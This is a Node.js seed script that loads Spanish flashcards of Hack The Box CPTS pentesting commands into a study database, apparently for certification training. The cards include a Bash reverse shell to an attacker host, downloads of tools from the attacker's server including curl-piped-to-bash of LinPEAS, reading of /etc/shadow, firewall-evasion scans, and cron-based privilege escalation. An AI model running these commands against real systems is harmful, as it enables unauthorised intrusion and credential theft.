const path = require('path');
require('dotenv').config({ path: path.join(__dirname, '.env') });
const { getPool, initializeDatabase } = require('./database/db');

const COMMAND_CARDS = [
  { concept_name: "sudo openvpn <archivo>.ovpn", content: "Conectarse a la VPN de Hack The Box usando OpenVPN. Si la conexion es exitosa, crea un adaptador virtual (ej. tun0) visible con ifconfig. Es el primer paso para conectarse a los laboratorios de HTB.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "ifconfig", content: "Muestra la configuracion de todas las interfaces de red del sistema. En HTB se usa para verificar que la interfaz tun0 (VPN) fue creada correctamente y obtener nuestra IP de atacante.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "ssh user@<IP>", content: "Conectarse remotamente a un servidor Linux via SSH (puerto 22). Solicita contrasenia. Es la forma mas comun de obtener acceso interactivo a una maquina comprometida o de acceder a servidores.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "ssh -i id_rsa user@<IP>", content: "Conectarse via SSH usando una clave privada RSA en lugar de contrasenia. Se usa cuando se encuentra un archivo id_rsa en la maquina victima. Requiere previamente hacer chmod 600 id_rsa.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "chmod 600 id_rsa", content: "Asigna permisos de solo lectura/escritura para el duenio a la clave privada SSH. Es OBLIGATORIO hacerlo antes de usar la clave con ssh -i, de lo contrario SSH rechaza la clave por ser demasiado permisiva.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "nc -lvnp 1234", content: "Levanta un Listener de Netcat en el puerto 1234 esperando una conexion entrante. Es el comando esencial para recibir una Reverse Shell. Flags: -l (listen), -v (verbose), -n (no DNS), -p (port).", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "bash -i >& /dev/tcp/<LHOST>/1234 0>&1", content: "Reverse Shell en Bash puro. El objetivo comprometido ejecuta este comando para enviar una shell interactiva hacia nuestra IP (LHOST) en el puerto 1234, donde tenemos nuestro listener nc -lvnp 1234.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'", content: "Primer paso para estabilizar (upgrade) una Reverse Shell basica de Netcat. Lanza un proceso bash real con PTY (pseudo-terminal), habilitando el historial de comandos y autocompletado con Tab.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "Ctrl+Z -> stty raw -echo -> fg", content: "Secuencia completa para estabilizar una shell de Netcat. Ctrl+Z pausa la shell al fondo, stty raw -echo pasa el control del teclado al proceso remoto (habilita Ctrl+C, flechas), fg la vuelve al primer plano.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "python3 -m http.server 8000", content: "Levanta un servidor HTTP simple en el puerto 8000 en el directorio actual del atacante. Permite que la maquina victima descargue herramientas (como LinPEAS) usando wget o curl.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "wget http://<LHOST>:8000/archivo -O /tmp/archivo", content: "Descarga un archivo desde el servidor HTTP del atacante hacia la maquina victima y lo guarda en /tmp/archivo. Es el metodo mas comun de transferencia de herramientas a la victima.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "curl http://<LHOST>:8000/archivo -o /tmp/archivo", content: "Alternativa a wget para descargar archivos. Util cuando wget no esta instalado. El flag -o especifica el archivo de salida de destino.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "base64 archivo -w 0", content: "Codifica un archivo en Base64 en una sola linea (sin saltos de linea con -w 0). Util para transferir binarios cuando los firewalls bloquean HTTP. La salida de texto se copia y pega en la victima.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "echo <BASE64_STRING> | base64 -d > archivo", content: "Decodifica una cadena Base64 y la escribe como archivo binario en la victima. Se usa junto con base64 archivo -w 0 para transferir archivos binarios sin usar HTTP.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "md5sum archivo", content: "Calcula el hash MD5 de un archivo. Se usa para verificar la integridad de archivos transferidos: el hash debe ser identico en el atacante y en la victima para confirmar que el binario llego sin corrupcion.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "sudo -l", content: "Lista los comandos que el usuario actual puede ejecutar con sudo. Es el primer comando a ejecutar tras obtener acceso. Si aparece NOPASSWD, el usuario puede correr esos binarios como root sin contrasenia.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "crontab -l", content: "Lista las tareas programadas (cron jobs) del usuario actual. Se buscan scripts que se ejecuten como root sobre los cuales tengamos permisos de escritura para inyectar una reverse shell.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "cat /etc/crontab", content: "Muestra el archivo de cron del sistema con todas las tareas programadas a nivel global. Revela scripts ejecutados periodicamente como root que pueden ser vulnerables a path hijacking o escritura directa.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "find / -perm -4000 -type f 2>/dev/null", content: "Busca en todo el sistema archivos con el bit SUID activado (-perm -4000). Archivos SUID se ejecutan con los permisos de su propietario (root). Son vectores clasicos de privilege escalation en Linux.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "find / -writable -type f 2>/dev/null", content: "Busca en todo el sistema todos los archivos sobre los que el usuario actual tiene permisos de escritura. Identifica scripts de cronjobs o configuraciones que se pueden modificar para escalar privilegios.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "nmap -sn 10.129.2.0/24", content: "Host Discovery: Ping sweep sobre toda la subred. El flag -sn deshabilita el escaneo de puertos. Devuelve solo la lista de hosts activos (que responden) en la red. Primer paso de enumeracion.", topic: "3) Nmap & Enumeration", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "sudo nmap -sS -sC -sV -p- <IP>", content: "Combo clasico HTB de enumeracion completa. -sS (SYN Scan sigiloso), -sC (scripts por defecto), -sV (deteccion de versiones), -p- (todos los 65535 puertos). El escaneo mas completo para una maquina objetivo.", topic: "3) Nmap & Enumeration", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "nmap -sS -p 22,80,443 <IP>", content: "SYN Scan rapido solo sobre los puertos especificados (22, 80, 443). Requiere sudo. Envia paquete SYN: si responde SYN-ACK el puerto esta ABIERTO, RST significa CERRADO, sin respuesta es FILTRADO.", topic: "3) Nmap & Enumeration", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "nmap -sU -p 161,623 <IP>", content: "Escaneo de puertos UDP especificos. UDP es mas lento (sin handshake). Se usa para servicios como SNMP (161) e IPMI (623). Muchos firewalls descuidan filtrar UDP, exponiendo servicios criticos.", topic: "3) Nmap & Enumeration", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "nmap -sV --version-intensity 5 <IP>", content: "Deteccion agresiva de versiones de servicios. La intensidad va de 0 (mas rapido, menos preciso) a 9 (mas lento, mas exacto). Vital para identificar la version exacta y buscar exploits con searchsploit.", topic: "3) Nmap & Enumeration", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "nmap -A <IP>", content: "Escaneo agresivo: agrupa OS Detection, Service Version (-sV), scripts por defecto (-sC) y traceroute en un solo comando. Es ruidoso pero ofrece una imagen muy completa del objetivo rapidamente.", topic: "3) Nmap & Enumeration", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "nmap --script vuln <IP>", content: "Ejecuta todos los scripts de la categoria 'vuln' del NSE. Nmap intenta detectar automaticamente vulnerabilidades conocidas (CVEs) en los servicios abiertos, consultando bases de datos como vulners.", topic: "3) Nmap & Enumeration", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "nmap -sA -p 80,443 <IP>", content: "TCP ACK Scan. Envia paquetes ACK en lugar de SYN. Util para mapear reglas del firewall: los firewalls stateless dejan pasar el ACK (simulando conexion establecida) y el objetivo responde RST si el puerto no esta filtrado.", topic: "3) Nmap & Enumeration", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "nmap -D RND:5 <IP>", content: "Escaneo con seniuelos (Decoys). Genera 5 IPs aleatorias para camuflar la IP real del atacante en el trafico de red. Dificulta que el administrador o IDS identifique de donde proviene el escaneo real.", topic: "3) Nmap & Enumeration", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "nmap --source-port 53 <IP>", content: "Source Port Spoofing. Setea el puerto de origen del escaneo al 53 (DNS). Los administradores a veces confian en trafico de puertos conocidos (53, 80), permitiendo que estos paquetes pasen a traves del firewall.", topic: "3) Nmap & Enumeration", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "nmap -oA scan_results <IP>", content: "Guarda los resultados del escaneo en los 3 formatos simultaneamente: .nmap (Normal), .gnmap (Grepable) y .xml (XML). Buena practica para documentar y procesar resultados despues.", topic: "3) Nmap & Enumeration", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "nmap -sS --min-rate 5000 -p- <IP>", content: "Escaneo rapido de todos los puertos enviando minimo 5000 paquetes por segundo. Sacrifica algo de precision por velocidad. Muy util en HTB para hacer un primer barrido rapido antes del escaneo detallado.", topic: "3) Nmap & Enumeration", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "gobuster dir -u http://<IP>/ -w /usr/share/seclists/Discovery/Web-Content/common.txt", content: "Directory Busting: Fuerza bruta de directorios y archivos ocultos en el servidor web. Usa el diccionario common.txt de SecLists. Descubre rutas como /admin, /login, /backup, /.git que no son visibles normalmente.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "whatweb http://<IP>/", content: "Fingerprinting de tecnologias web. Identifica el CMS (WordPress, Joomla), servidor (Apache, Nginx), framework, versiones y plugins. Equivalente a Wappalyzer pero desde la linea de comandos.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "curl -s http://<IP>/ | grep -i 'version\\|admin\\|password'", content: "Descarga el codigo fuente de la pagina y filtra lineas que contengan palabras clave como version, admin o password. Util para encontrar comentarios, credenciales hardcodeadas o rutas sensibles en el HTML.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "searchsploit <servicio> <version>", content: "Busca exploits publicos en la base de datos local de Exploit-DB. Ej: searchsploit openssh 7.2. Se usa despues de identificar el servicio y version con Nmap (-sV) para encontrar vulnerabilidades conocidas.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "msfconsole", content: "Lanza la consola interactiva de Metasploit Framework. Permite buscar (search), seleccionar (use) y configurar modulos de explotacion. Es el punto de entrada para usar exploits integrados con payloads automatizados.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "ftp <IP>", content: "Conecta al servicio FTP del objetivo en el puerto 21. Solicita usuario y contrasenia. Para probar acceso anonimo, el usuario es 'anonymous' y la contrasenia puede estar en blanco o ser cualquier email.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "ftp> ls -la", content: "Dentro de una sesion FTP, lista todos los archivos y directorios incluyendo los ocultos (que empiezan con punto). Equivale al ls -la de Linux. Revela archivos de configuracion y backups sensibles.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "ftp> get <archivo>", content: "Dentro de una sesion FTP, descarga el archivo especificado al directorio local actual. Se usa para exfiltrar archivos sensibles encontrados en el servidor FTP.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "ftp> put <archivo_local>", content: "Dentro de una sesion FTP, sube un archivo local al servidor. Si el directorio tiene permisos de escritura, puede usarse para subir una webshell PHP u otras herramientas.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "smbclient -N -L //<IP>", content: "Lista todos los recursos compartidos (shares) de SMB usando una sesion nula (anonima) con el flag -N (sin contrasenia). Revela shares como IPC$, C$, ADMIN$ y posibles shares personalizados.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "smbclient //<IP>/<share> -U user", content: "Conecta a un share SMB especifico con credenciales. Una vez dentro, comandos como ls, get, put, cd permiten navegar y descargar/subir archivos igual que en una sesion FTP.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "rpcclient -U \"\" <IP>", content: "Conecta al servicio RPC de SMB con sesion nula (null session). Permite ejecutar comandos como enumdomusers (listar usuarios del dominio), enumdomgroups, queryuser para enumeracion de Active Directory.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "crackmapexec smb <IP> -u '' -p '' --shares", content: "Enumera los shares SMB usando autenticacion anonima/nula. CrackMapExec (CME) es la navaja suiza para SMB: permite enumerar shares, usuarios, politicas de contrasenias y ejecutar comandos remotos.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "showmount -e <IP>", content: "Muestra todos los directorios exportados (shares) por el servidor NFS en el puerto 2049. Es el primer paso para enumerar un servidor NFS y ver que carpetas estan disponibles para montar.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "sudo mount -t nfs <IP>:/carpeta /tmp/nfs_mount", content: "Monta un share NFS remoto en un directorio local (/tmp/nfs_mount). Una vez montado, se puede navegar y acceder a los archivos como si fueran locales. Peligroso si el servidor tiene no_root_squash.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "dig @<DNS_IP> version.bind CHAOS TXT", content: "Extrae la version del servidor DNS usando el registro especial CHAOS TXT. Util cuando Nmap no logra identificar la version del DNS. Revela el software y version exacta (ej. BIND 9.x.x).", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "dig axfr @<ns.dominio.com> <dominio.com>", content: "Intenta una Transferencia de Zona DNS (AXFR). Si el servidor DNS esta mal configurado, devuelve TODOS los registros del dominio incluyendo subdominios internos. Una de las vulnerabilidades DNS mas criticas.", topic: "3) Nmap & Enumeration", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "dig <dominio.com> ANY", content: "Consulta todos los registros DNS disponibles de un dominio (A, AAAA, MX, NS, TXT, SOA). El registro TXT suele revelar servicios cloud usados (Google Workspace, Office 365, Sendgrid, etc.).", topic: "3) Nmap & Enumeration", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "dig +short <dominio.com>", content: "Realiza una consulta DNS y muestra SOLO la respuesta corta (la IP). Util en scripts para obtener la IP de un dominio de forma limpia sin el output verboso de dig por defecto.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "dig @1.1.1.1 <dominio.com>", content: "Consulta DNS usando el servidor 1.1.1.1 (Cloudflare) en lugar del resolver predeterminado. Util para verificar la respuesta publica de un dominio o cuando el resolver local esta filtrado/roto.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "nc -nv <IP> 25", content: "Conecta al servidor SMTP en el puerto 25 usando Netcat para Banner Grabbing e interaccion manual. Permite probar comandos SMTP como VRFY para enumerar usuarios o verificar si es un Open Relay.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "VRFY root", content: "Comando SMTP (enviado tras conectar con nc al puerto 25) que comprueba si el buzon de un usuario existe en el servidor. Si responde 250, el usuario existe. Se usa para enumerar usuarios validos del sistema.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "snmpwalk -v 2c -c public <IP>", content: "Enumera todos los OIDs (Object Identifiers) del servidor SNMP usando la community string 'public' y la version 2c. Puede revelar usuarios del sistema, procesos en ejecucion, interfaces de red y configuraciones.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "onesixtyone -c community_strings.txt <IP>", content: "Fuerza bruta de Community Strings de SNMP contra un objetivo. onesixtyone es muy rapido. Si adivina la community string (ej. 'private'), podemos usar snmpwalk con ella para obtener informacion de lectura/escritura.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "whois <dominio.com>", content: "Consulta la base de datos WHOIS para obtener informacion de registro del dominio: registrador, fechas de creacion/expiracion, servidores de nombres (NS) y a veces datos de contacto del propietario.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "gobuster dns -d <dominio.com> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt", content: "Fuerza bruta de subdominios DNS usando Gobuster en modo dns. Prueba palabras del diccionario como subdominios (admin.dominio.com, mail.dominio.com). Descubre subdominios que no aparecen en CT Logs.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "gobuster vhost -u http://<IP> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain", content: "VHost Fuzzing: Fuerza bruta del header HTTP 'Host' para descubrir Virtual Hosts ocultos en una misma IP. Encuentra dominios internos que no tienen registros DNS publicos pero existen en el servidor.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "ffuf -w wordlist.txt -u http://<IP>/ -H 'Host: FUZZ.<dominio>' -fs <size>", content: "VHost Fuzzing con ffuf. Inyecta cada palabra del diccionario en el header Host. El flag -fs filtra respuestas con un tamano especifico (para eliminar falsos positivos). Mas flexible que Gobuster.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "curl -s 'https://crt.sh/?q=<dominio>&output=json' | jq .", content: "Consulta los Certificate Transparency Logs en crt.sh y formatea la salida con jq. Revela subdominios reales y pasados del dominio sin hacer fuerza bruta. Tecnica de reconocimiento pasivo completamente indetectable.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "dnsenum --enum <dominio.com> -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt", content: "Herramienta todo-en-uno para enumeracion DNS. Realiza: consultas de registros basicos (A, MX, NS), intento de Zone Transfer (AXFR) y fuerza bruta de subdominios en un solo comando.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "curl -I http://<dominio.com>", content: "Banner Grabbing HTTP: Solicita solo los headers de respuesta del servidor (metodo HEAD). Revela el servidor (Apache/Nginx/IIS), version, tecnologia del backend (X-Powered-By: PHP), cookies de sesion y mas.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "wafw00f http://<dominio.com>", content: "Detecta si hay un Web Application Firewall (WAF) protegiendo el sitio e identifica cual es (Cloudflare, ModSecurity, Wordfence, etc.). Envia payloads inofensivos para analizar las respuestas del servidor.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "nikto -h http://<IP>/", content: "Scanner de vulnerabilidades web. Comprueba el servidor contra una base de datos de problemas conocidos: archivos de configuracion expuestos, software desactualizado, cabeceras de seguridad ausentes, y mas de 6700 checks.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "curl -s http://<dominio.com>/robots.txt", content: "Descarga y muestra el contenido del robots.txt. En web recon es una mina de oro: las rutas con 'Disallow' son exactamente las que el administrador no quiere que los bots (ni los pentesters) visiten.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "curl -s http://<dominio.com>/.well-known/security.txt", content: "Consulta el archivo security.txt estandar (RFC 9116). Contiene informacion de contacto del equipo de seguridad: email, politica de divulgacion, canales PGP. Puede revelar sistemas de bug bounty.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "theHarvester -d <dominio.com> -b google,linkedin,shodan", content: "Recoleccion pasiva de OSINT: busca emails, nombres de empleados, subdominios e IPs del dominio objetivo usando motores de busqueda y fuentes publicas (Google, LinkedIn, Shodan). Muy util en reconocimiento inicial.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "python3 finalrecon.py --full http://<dominio.com>", content: "Ejecuta FinalRecon en modo completo: WHOIS, headers, SSL cert info, crawling, DNS records, descubrimiento de subdominios y analisis de Wayback Machine. Framework Python todo-en-uno de reconocimiento web.", topic: "5) Info Gathering - Web", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "python3 mssqlclient.py <usuario>@<IP> -windows-auth", content: "Conecta a un servidor MSSQL usando Impacket con autenticacion de Windows. Una vez dentro, permite ejecutar queries SQL, habilitar xp_cmdshell para RCE, y escalar privilegios en el servidor de base de datos.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "evil-winrm -i <IP> -u <usuario> -p <password>", content: "Conecta a Windows Remote Management (WinRM, puerto 5985) con credenciales. Proporciona una shell PowerShell interactiva. Alternativa a RDP para administracion remota de Windows cuando se tienen credenciales validas.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "xfreerdp /v:<IP> /u:<usuario> /p:<password>", content: "Conecta al escritorio remoto de Windows (RDP, puerto 3389) desde Linux. Proporciona acceso completo a la interfaz grafica del escritorio de Windows. Muy util en maquinas HTB con entorno Windows.", topic: "4) Footprinting", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "id", content: "Muestra la identidad del usuario actual: UID (User ID), GID (Group ID) y todos los grupos a los que pertenece. Primer comando a ejecutar tras obtener una shell para saber con que privilegios se cuenta.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "whoami", content: "Muestra el nombre del usuario actual que esta ejecutando los comandos. Mas simple que 'id'. En Windows, whoami /all muestra tambien los grupos y privilegios del usuario.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "uname -a", content: "Muestra informacion completa del kernel del sistema operativo: nombre del SO, hostname, version del kernel, arquitectura (x86_64). Vital para buscar exploits de kernel para privilege escalation.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "cat /etc/passwd", content: "Lee el archivo de usuarios del sistema. Muestra todos los usuarios locales, su UID, GID, directorio home y shell por defecto. En algunos sistemas mal configurados las contrasenias (hash) estan aqui mismo.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "cat /etc/shadow", content: "Lee el archivo de contrasenias hasheadas. Solo accesible por root. Si se puede leer, los hashes pueden crackearse offline con John the Ripper o Hashcat para obtener las contrasenias en texto plano.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "ss -tulnp", content: "Lista todos los puertos en escucha en la maquina: TCP (-t), UDP (-u), sockets que escuchan (-l), sin resolucion de nombres (-n), con el proceso que los usa (-p). Equivale al netstat -tulnp para encontrar servicios internos.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "ps aux", content: "Lista todos los procesos en ejecucion del sistema con detalles: usuario, PID, uso de CPU/RAM y la linea de comando completa. Util para encontrar procesos de root ejecutando scripts vulnerables.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "env", content: "Muestra todas las variables de entorno del usuario actual. Puede revelar contrasenias, tokens de API, rutas de configuracion o claves secretas almacenadas por descuido en variables de entorno.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "history", content: "Muestra el historial de comandos ejecutados por el usuario actual en la shell. Frecuentemente contiene contrasenias pasadas como argumentos, conexiones SSH anteriores y rutas de archivos sensibles.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" },
  { concept_name: "curl -s http://<LHOST>/linpeas.sh | bash", content: "Descarga y ejecuta LinPEAS directamente en memoria (sin escribir al disco) desde nuestro servidor HTTP. LinPEAS es el script de enumeracion de privilege escalation mas completo para Linux.", topic: "2) Getting Started", author: "Hack The Box (CPTS)", category: "Comandos" }
];

async function importData() {
  try {
    await initializeDatabase();
    const db = getPool();
    const [users] = await db.execute('SELECT id, username FROM users');
    if (!users || users.length === 0) {
      console.error('No se encontraron usuarios.');
      process.exit(1);
    }
    const todayStr = new Date().toISOString().split('T')[0];
    let insertedCount = 0;
    for (const user of users) {
      for (const card of COMMAND_CARDS) {
        await db.execute(
          'INSERT INTO cybersecurity_cards (user_id, concept_name, content, topic, author, category, next_review) VALUES (?, ?, ?, ?, ?, ?, ?)',
          [user.id, card.concept_name, card.content, card.topic, card.author, card.category, todayStr]
        );
        insertedCount++;
      }
    }
    console.log('Inyectadas ' + insertedCount + ' tarjetas de Comandos HTB para ' + users.length + ' usuario(s).');
    console.log('Total de comandos: ' + COMMAND_CARDS.length + ' tarjetas.');
    process.exit(0);
  } catch (error) {
    console.error('Error inyectando tarjetas de comandos:', error);
    process.exit(1);
  }
}
importData();
